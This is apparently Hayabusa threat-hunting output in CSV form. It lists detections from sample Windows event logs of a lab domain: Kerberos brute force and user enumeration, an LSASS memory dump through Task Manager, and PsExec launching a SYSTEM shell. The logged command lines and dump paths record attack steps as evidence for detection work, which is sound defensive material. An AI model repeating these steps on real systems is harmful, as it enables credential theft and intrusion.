+00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rey | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.357 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vase | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.360 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ryver | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.363 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: yvsyv | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.367 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: srey | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with 
non existing users.evtx +2021-12-02 14:48:17.370 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: b aer | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.373 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: yvas | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.376 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: tbyt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.379 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: nini | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.382 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ugu | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential 
Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.385 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,"User: m,og | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -",rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.389 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: go | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.392 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: nd | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.395 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: bdcy | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.398 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rec | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: 
-,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.401 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: xt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.405 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: accrt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.408 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: wyt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.410 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: xc | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.413 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vt | Svc: krbtgt/OFFSEC.LAN | IP Addr: 
::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.416 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ytuntsr | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.420 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vga | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.423 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: tfay | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.426 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: sef | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.430 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT 
Requested,User: gsdf | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:17.433 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: sfs | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:23.180 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: HealthMailboxf49e2c8 | Svc: krbtgt | IP Addr: ::ffff:10.23.42.16 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-03 12:06:03.488 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: Administrator | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 12:06:03.493 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: Guest | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 12:06:03.497 
+00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: DefaultAccount | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 12:06:03.510 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: krbtgt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 12:06:03.847 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admmig | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 12:06:04.904 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: Test-ADM | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 12:06:04.910 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admin-test | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx 
+2021-12-03 12:06:06.986 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: $P51000-50I28MP5JB3E | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 12:06:07.006 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_27d255b6407743b08 | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 12:06:07.010 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_2b6f1a51ac6c41b2a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 12:06:07.014 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_25e3b4425ffd47aab | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 12:06:07.021 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_8b9faa99d83446d1b | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: 
-,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 12:06:07.031 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_6aaeeb113c0c4af3a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 12:06:07.035 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_2f6964c8f421408ab | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 12:06:07.047 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_374806bcc65140a5a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 12:06:07.052 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_b2a35e76f50a4c23a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 12:06:07.056 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: 
SM_957258b5879242afb | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 12:06:11.514 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: hack1 | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 12:06:11.878 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: hacker2 | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 12:06:12.553 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: dsrm | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-04 20:59:31.403 +00:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\SYSTEM32\cmd.exe /c ""C:\tools\shell.cmd"" | Path: C:\Windows\System32\cmd.exe | PID: 0x13a4 | User: FS03VULN$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-Task Manager access indicator for potential LSASS 
dump.evtx +2021-12-04 21:10:40.723 +00:00,fs03vuln.offsec.lan,11,info,,File Created,Path: C:\Users\admmig\AppData\Local\Temp\lsass (4).DMP | Process: C:\Windows\System32\Taskmgr.exe | PID: 3504 | PGUID: A57649D1-D6B1-61AB-A5E4-D70100000000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-LSASS credentials dump via Task Manager.evtx +2021-12-04 21:10:40.723 +00:00,fs03vuln.offsec.lan,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-LSASS credentials dump via Task Manager.evtx +2021-12-04 21:10:40.723 +00:00,fs03vuln.offsec.lan,11,high,CredAccess,LSASS Memory Dump File Creation,,rules/sigma/file_event/file_event_win_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-LSASS credentials dump via Task Manager.evtx +2021-12-04 21:19:16.741 +00:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1035,technique_name=Service Execution | Cmd: PsExec64.exe -i -s cmd | Process: C:\TOOLS\PsExec64.exe | User: OFFSEC\admmig | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x83ef56 | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000 | Hash: SHA1=FB0A150601470195C47B4E8D87FCB3F50292BEB2,MD5=9321C107D1F7E336CDA550A2BF049108,SHA256=AD6B98C01EE849874E4B4502C3D7853196F6044240D3271E4AB3FC6E3C08E9A4,IMPHASH=159D56D406180A332FBC99290F30700E",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-04 21:19:16.757 +00:00,fs03vuln.offsec.lan,11,info,,File Created,Path: C:\Windows\PSEXESVC.exe | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: 
A57649D1-DB54-61AB-775C-DC0100000000,rules/hayabusa/sysmon/events/11_FileCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-04 21:19:16.757 +00:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1035,technique_name=Service Execution | SetValue: HKU\S-1-5-21-4230534742-2542757381-3142984815-1111\Software\Sysinternals\PsExec\EulaAccepted: DWORD (0x00000001) | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-04 21:19:16.757 +00:00,fs03vuln.offsec.lan,11,low,Exec,PsExec Tool Execution,,rules/sigma/file_event/file_event_win_tool_psexec.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-04 21:19:16.757 +00:00,fs03vuln.offsec.lan,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-04 21:19:16.804 +00:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-04 21:19:16.804 +00:00,fs03vuln.offsec.lan,17,low,Exec,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system 
execution.evtx" +2021-12-04 21:19:16.913 +00:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC | Process: System | PID: 4 | PGUID: A57649D1-92D1-61A4-EB03-000000000000",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-04 21:19:16.913 +00:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdin | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-04 21:19:16.913 +00:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdout | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-04 21:19:16.913 +00:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stderr | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-04 21:19:16.913 +00:00,fs03vuln.offsec.lan,18,low,Exec,PsExec Tool 
